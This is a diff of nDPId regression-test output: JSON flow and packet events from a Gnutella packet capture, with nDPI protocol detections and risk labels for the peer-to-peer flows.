+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":86639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":86639,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0EcBAAIAG34AKAAIPYPacfsRk2wZPr5++AAAAAIAC+vDbwgAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":715,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":86639,"flow_last_seen":86639,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":86639,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":50277,"dst_port":36368,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":715,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":86639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":86639,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0sxxAAIAG7QgKAAIPUrX72sRljhBQLtKuAAAAAIAC+vCkLQAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":716,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":86640,"flow_last_seen":86640,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":86640,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.231.59.187","src_port":50278,"dst_port":62234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":716,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":86640,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":86640,"pkt":"UlQAEjUCCAAn5uVZCABFAAA04CNAAIAGre8KAAIPJOc7u8Rm8xqBNdLHAAAAAIAC+vD77wAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":717,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":86641,"flow_last_seen":86641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":86641,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.91.201","src_port":50279,"dst_port":4297,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":717,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":86641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":86641,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0vEFAAIAGZK4KAAIPcfxbycRnEMmMdJG3AAAAAIAC+vCm7gAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":720,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":2,"flow_last_seen":87610,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":87610,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0y5NAAIAGmKcKAAIPchsYX8ReLKPFX+7aAAAAAIAC+vA4WgAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":2,"flow_last_seen":87611,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":87611,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KphAAIAGI10KAAIP2qTGG8Rf6yo8NHW4AAAAAIAC+vBl2QAAAgQFtAEDAwgBAQQC"} +00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":722,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":87670,"flow_last_seen":87670,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":87670,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"99.199.148.6","src_port":50280,"dst_port":4338,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":87670,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":87670,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0IMpAAIAG1h0KAAIPY8eUBsRoEPJVbcPeAAAAAIAC+vCBnAAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":723,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":87670,"flow_last_seen":87670,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":87670,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.134.154.158","src_port":50281,"dst_port":54130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":723,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":87670,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":87670,"pkt":"UlQAEjUCCAAn5uVZCABFAAA068NAAIAGCc0KAAIPXoaansRp03KjrVDkAAAAAIAC+vDifQAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":724,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":87671,"flow_last_seen":87671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":87671,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"221.124.66.33","src_port":50282,"dst_port":13060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":724,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":87671,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":87671,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0aolAAIAGZI4KAAIP3XxCIcRqMwT80GtdAAAAAIAC+vDo1QAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":725,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":87671,"flow_last_seen":87671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":87671,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50283,"dst_port":35004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":725,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":87671,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":87671,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0eNtAAIAGqL8KAAIPM0SZ1sRriLxORLlDAAAAAIAC+vBGRgAAAgQFtAEDAwgBAQQC"} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":2,"flow_last_seen":87706,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":87706,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoAyIAAP8G34QzRJnWCgACD4i8xGsAAAAATkS5RFAUAACB9gAA"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":732,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":3,"flow_last_seen":88219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88219,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0eNxAAIAGqL4KAAIPM0SZ1sRriLxORLlDAAAAAIAC+vBGRgAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":734,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":2,"flow_last_seen":88622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88622,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0AthAAIAGwDgKAAIPGLMS8sRhuOFovA6\/AAAAAIAC+vBHrQAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":735,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":2,"flow_last_seen":88622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88622,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UChAAIAGv8kKAAIPenVkTsRjIzKhF7fWAAAAAIAC+vBIyQAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":2,"flow_last_seen":88622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88622,"pkt":"UlQAEjUCCAAn5uVZCABFAAA07j1AAIAGRpsKAAIPAay4MMRgM\/L4VuGpAAAAAIAC+vDb4AAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":2,"flow_last_seen":88622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88622,"pkt":"UlQAEjUCCAAn5uVZCABFAAA03zxAAIAGuFcKAAIPRK4Sc8RixfcTIeyiAAAAAIAC+vCG0QAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":88704,"flow_last_seen":88704,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":88704,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":50284,"dst_port":53258,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":88704,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88704,"pkt":"UlQAEjUCCAAn5uVZCABFAAA05t5AAIAGvPEKAAIPaJziSMRs0ArGWKhyAAAAAIAC+vAZ6QAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":741,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":88704,"flow_last_seen":88704,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":88704,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":50285,"dst_port":52367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":88704,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88704,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0cchAAIAGzAoKAAIPS4VlXcRtzI\/Cd\/CCAAAAAIAC+vBzNgAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":742,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":88705,"flow_last_seen":88705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":88705,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.118.116.198","src_port":50286,"dst_port":44616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":742,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":88705,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88705,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QNJAAIAG5KYKAAIPVHZ0xsRurkgo6JHMAAAAAIAC+vBxaAAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":743,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":88706,"flow_last_seen":88706,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":88706,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.215.130.156","src_port":50287,"dst_port":12405,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":743,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":88706,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88706,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QYJAAIAGx78KAAIPYteCnMRvMHWjnzXtAAAAAIAC+vC0KwAAAgQFtAEDAwgBAQQC"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":2,"flow_last_seen":88816,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":88816,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAyoAAEAGurFLhWVdCgACD8yPxG0AoxYBwnfwg2AS\/\/+AiAAAAgQFtA=="} +00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":3,"flow_last_seen":88816,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":88816,"pkt":"UlQAEjUCCAAn5uVZCABFAAAocclAAIAGzBUKAAIPS4VlXcRtzI\/Cd\/CDAKMWAlAQ+vCdVAAA"} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":88704,"flow_last_seen":88817,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":88817,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":50285,"dst_port":52367,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":750,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":2,"flow_last_seen":88832,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":88832,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAywAAEAGIK1onOJICgACD9AKxGwApBABxlioc2AS\/\/8tOgAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":751,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":3,"flow_last_seen":88832,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":88832,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo5t9AAIAGvPwKAAIPaJziSMRs0ArGWKhzAKQQAlAQ+vBKBgAA"} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":752,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":88704,"flow_last_seen":88833,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":88833,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":50284,"dst_port":53258,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":3,"flow_last_seen":88897,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":88897,"pkt":"CAAn5uVZUlQAEjUCCABFwAA4Ay4AAP8Bn8YKAAICCgACDwMBvHoAAAAARQAANFAnQAB\/BsDKCgACD3p1ZE7EYyMyoRe31g=="} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":758,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":88941,"flow_last_seen":88941,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":88941,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":28681,"dst_port":52367,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":758,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":88941,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":88941,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4ccwAAIARC\/gKAAIPS4VlXXAJzI8AJKBHjeQxAkkpJRz\/KX356SYEAwABAAUAAADDglFLQA=="} @@ -750,14 +750,14 @@ 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":771,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":2,"flow_last_seen":89584,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":89584,"pkt":"UlQAEjUCCAAn5uVZCABFAABZcc8AAIARC9QKAAIPS4VlXXAJzI8ARbt690gxArBfVnIskre5+iSoOkQAACYAAAABR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAA=="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":772,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":3,"flow_last_seen":89584,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":89584,"pkt":"UlQAEjUCCAAn5uVZCABFAABZcdAAAIARC9MKAAIPS4VlXXAJzI8ARU1UTtkxAvX0Cql3HOwyFoQpokQAACYAAAABR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAA=="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":774,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":3,"flow_last_seen":89612,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":89612,"pkt":"UlQAEjUCCAAn5uVZCABFAABZ5uQAAIAR\/LsKAAIPaJziSHAJ0AoARRIl9XkxAr8paNvEgdBJGPDFY0QAACYAAAABR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAA=="} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":776,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":2,"flow_last_seen":89653,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":89653,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0vEJAAIAGZK0KAAIPcfxbycRnEMmMdJG3AAAAAIAC+vCm7gAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":777,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":2,"flow_last_seen":89653,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":89653,"pkt":"UlQAEjUCCAAn5uVZCABFAAA04CRAAIAGre4KAAIPJOc7u8Rm8xqBNdLHAAAAAIAC+vD77wAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":2,"flow_last_seen":89653,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":89653,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0sx1AAIAG7QcKAAIPUrX72sRljhBQLtKuAAAAAIAC+vCkLQAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":2,"flow_last_seen":89653,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":89653,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0EcFAAIAG338KAAIPYPacfsRk2wZPr5++AAAAAIAC+vDbwgAAAgQFtAEDAwgBAQQC"} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":783,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89732,"flow_last_seen":89732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":89732,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.119.55.28","src_port":50288,"dst_port":20347,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":783,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":89732,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":89732,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0AqRAAIAGaH4KAAIPTHc3HMRwT3sv+xA+AAAAAIAC+vCQWAAAAgQFtAEDAwgBAQQC"} 